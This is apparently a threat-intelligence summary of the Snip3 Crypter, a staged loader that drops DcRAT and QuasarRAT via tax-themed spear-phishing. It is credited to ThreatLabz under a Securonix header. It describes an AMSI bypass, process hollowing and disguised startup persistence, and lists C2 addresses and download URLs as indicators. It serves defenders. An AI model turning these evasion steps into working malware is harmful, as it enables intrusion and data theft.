Threat Research

Snip3 Crypter Reveals New TTPs Over Time

Securonix

ThreatLabz analyzes the Snip3 Crypter, a multi-stage RAT loader offered as a crypter-as-a-service, which deploys new TTPs to deliver DcRAT and QuasarRAT across multiple industries via spear-phishing. The campaigns repeatedly evolve techniques to evade detection, including in-memory loading, AMSI bypass, and frequent infrastructure changes. #Snip3Crypter #DcRAT #QuasarRAT #SpearPhishing #TaxStatements #ThreatLabz

Keypoints

  • Threat actors use spear phishing emails with subjects related to “tax statements” to lure victims into the multi-stage infection chain.
  • The top targeted industries include Healthcare, Energy, and Manufacturing.
  • Snip3 Crypter delivers remote access trojans like DcRAT and QuasarRAT using new TTPs in its infection chain.
  • New techniques in the infection chain include fetching malicious strings from database servers, AMSI bypass by forcing an error, in-memory decryption with hardcoded keys, and stage-by-stage PowerShell delivery.
  • The final RAT payloads are delivered via RunPE-based process hollowing (Stage-4) after dynamic code compilation.
  • Threat actors frequently shift infrastructure and use URL shortening to evade domain-based detections (TinyURL).

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The attack is initiated through a spear phishing email with subject lines like “Download your tax statement.” – “The attack is initiated through a spear phishing email that has the subject line ‘Download your tax statement’ or, in French, ‘Télécharger votre relevé fiscal’.”
  • [T1059.005] VBScript – Stage-1 VBScript establishes a database connection via ADODB to fetch data as part of the infection chain – “Stage-1 VBScript … establishes a connection to a database by creating an ADODB connection and record object.”
  • [T1047] WMI – The malware uses WMI to fetch system identifiers (UUID) for fingerprinting – “HWID() function executes a WMI Object query (‘get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID’).”
  • [T1082] System Information Discovery – Stage-3 collects OS name/Version/Architecture and user details to tailor the payload – “the operating system’s name, version, and architecture (32-bit or 64-bit) are collected …”
  • [T1055.012] Process Hollowing – RunPE-based loader is used to inject the final RAT into a remote process – “The loader … RunPE source code … to perform Process Hollowing to execute the RAT.”
  • [T1562.001] AMSI Bypass – An AMSI bypass is used by setting AmsiContext to 0 to prevent AMSI from detecting the script – “AMSI bypass was discovered … by setting the AmsiContext to ‘0,’ which causes AmsiScanBuffer/AmsiScanString to return E_INVALIDARG.”
  • [T1059.001] PowerShell – Stage-2/Stage-3 PowerShell usage and execution flow including downloads and in-memory execution – “Powershell.exe -ExecutionPolicy RemoteSigned -Command ‘Decoded PowerShell Script’.” and “Invoke-Expression” usage to run Stage-3/Stage-4 scripts.
  • [T1105] Ingress Tool Transfer – Stage-3/Stage-4 PS scripts are downloaded from a remote download server over HTTP – “The Stage-3 PowerShell Script downloads the Stage-4 Powershell script from the Download Server.”
  • [T1547.001] Boot or Logon Autostart: Startup Folder – Persistence by writing a VBScript to the Startup folder that runs upon system startup – “On every system startup, the ‘GoogleChromeUpdateHandlerx64.vbs’ script is executed from the startup folder.”

Indicators of Compromise (IoCs)

  • [Hash] Stage-1 VBScript – bd23ae38590d87243af890505d6fbeec, a41de1ef870e970e265cc35b766a5ec8
  • [Domain] Downloads for malicious strings – SQL8001.site4now.net, SQL8003.site4now.net, SQL8004.site4now.net
  • [URL] Stage-2/Stage-3 download URLs – pastetext.net/raw/lcscgt0mss, toptal.com/developers/hastebin/raw/buliforayu
  • [Hash] Stage-2 PowerShell – a5b76ca780ddff061db6f86f03d3b120
  • [Hash] Stage-3 PowerShell – b78c9bb6070340bb4d352c712a0a28b7
  • [IP] Final-stage download servers – 185.81.157.59, 185.81.157.172, 185.81.157.136, 185.81.157.117
  • [Hash] DcRAT Loader – 923f46f8a9adfd7a48536de6f851d0f7
  • [Hash] QuasarRAT Loader – dda2ba195c9ebc9f169770290cd9f68a
  • [Hash] Final DcRAT payload – ef2236c85f915cae6380c64cc0b3472a
  • [Hash] Final QuasarRAT payload – 0bbc89719ff3c4a90331288482c95eac
  • [Domain] DcRAT C2 – crazydns.linkpc.net:5900
  • [IP] QuasarRAT C2 – 185.81.157.203:1111

Read more: https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time